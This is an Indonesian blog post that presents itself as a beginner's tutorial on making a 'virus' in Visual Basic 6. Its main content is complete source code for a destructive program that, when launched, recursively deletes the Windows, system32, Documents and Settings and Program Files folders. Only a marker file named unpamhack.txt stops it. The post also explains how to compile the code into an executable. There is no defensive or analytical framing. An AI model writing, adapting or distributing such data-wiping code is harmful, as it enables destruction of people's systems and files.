Member

Google+ Followers

Iklan

promo mobil murah

Blog Archive

Diberdayakan oleh Blogger.
Kamis, 15 Maret 2012
Tutorial buat virus dengan visual basic
Filed under: visual basic

tutorial kali ini membahas tentang bagaiman cara membuat virus dengan visual basic mungkin bagi master2 vb tidak perlu untuk membaca tutorial ini dikhususkan untuk pemula banyak sekali virus2 yaang sudah bertebaran di internet tapi bagaimana program virus itu bekerja berikut langkah-langkahnya


angkah-langkahnya adalah:

1. Buka VB 6.0 kalian lalu pilih Standart Exe.
2. Lalu buat formnya sekecil mungkin.
3. Dan klik 2x pada form itu dan akan menampilkan halaman untuk menaruh source kode, tolong hapus kode yang sudah ada, dan CoPas seluruh kode dibawah ini:

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\unpamhack.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function

4. Setelah udah diCoPas silahkan dieksekusi dengan menekan tombol F5, atau bikin jadi exe. dengan cara buka menu File pilih Make Project1.exe simpan dengan nama apa saja,, Oupsss tunggu dulu baca dulu sampe kelar, cos bahaya nanti…

Nah untuk keterangan dari koding diatas adalah, pada teks yang warna hijau itu penangkal nih virus, jadi kalau di folder c:\windows\system32\ ada file yang namanya unpamhack.txt, kalian ga bakal keserang oleh virus ini. bisa kalian edit koq jadi apa aja.. Satu lagi kalian gak bisa ngedit folder drive D yang untuk dijadikan objek untuk dihapus karena hanya bisa menghapus sistem saja. Apa jadinya kalau sistem terhapus?? ERRRROOORRR alias komputer situ ngblanggggg…..blengg..blengg..bleenggg…

Silahkan Gunakan Facebook Comment, Jika Anda Tidak Memiliki Url Blog!

Like Facebook ya! Follow Twitter mu by Invader's , Ingin ingin menerima posting terbarunya? TWITTER?

0 komentar:

Related Posts Plugin for WordPress, Blogger...

Total Tayangan Laman

Translate